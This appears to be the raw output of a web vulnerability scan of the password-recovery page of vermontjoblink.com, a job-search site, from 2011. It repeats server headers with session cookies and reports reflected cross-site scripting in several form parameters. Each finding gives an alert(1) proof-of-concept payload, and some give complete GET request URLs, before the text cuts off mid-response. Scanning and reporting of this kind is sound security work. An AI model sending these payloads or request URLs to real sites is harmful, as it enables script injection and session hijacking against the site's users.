HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the OLD_CHOICE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca44"style%3d"x%3aexpression(alert(1))"42ce90c0891 was submitted in the OLD_CHOICE_prev parameter. This input was echoed as dca44"style="x:expression(alert(1))"42ce90c0891 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:05'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the RAND_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8a7"style%3d"x%3aexpression(alert(1))"c44cab2e4c1 was submitted in the RAND_prev parameter. This input was echoed as 1c8a7"style="x:expression(alert(1))"c44cab2e4c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:59'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the SECURITYSYS_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de510"style%3d"x%3aexpression(alert(1))"dcaa05356ba was submitted in the SECURITYSYS_prev parameter. This input was echoed as de510"style="x:expression(alert(1))"dcaa05356ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:10 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:10'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the U_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaf8"style%3d"x%3aexpression(alert(1))"801d98fbf25 was submitted in the U_name parameter. This input was echoed as daaf8"style="x:expression(alert(1))"801d98fbf25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:35'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22113"style%3d"x%3aexpression(alert(1))"293bf60f081 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as 22113"style="x:expression(alert(1))"293bf60f081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:48'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as aa244"style="x:expression(alert(1))"619b41b3cda6e8e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The original request used the POST method; however, it was possible to convert the request to the GET method to simplify demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:06 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5 was submitted in the cftextboxextradonotuse parameter. This input was echoed as 862fa"style="x:expression(alert(1))"ccd6b612736c001e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The original request used the POST method; however, it was possible to convert the request to the GET method to simplify demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9626d"style%3d"x%3aexpression(alert(1))"bc06bcef9e was submitted in the cftextboxextradonotuse parameter. This input was echoed as 9626d"style="x:expression(alert(1))"bc06bcef9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:43'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2035"style%3d"x%3aexpression(alert(1))"4c07fa26276 was submitted in the choice parameter. This input was echoed as b2035"style="x:expression(alert(1))"4c07fa26276 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:39 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:39'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the errorfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853 was submitted in the errorfields parameter. This input was echoed as d074f"style="x:expression(alert(1))"ea31d84cdc0b4d853 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The original request used the POST method; however, it was possible to convert the request to the GET method to simplify demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuseridd074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
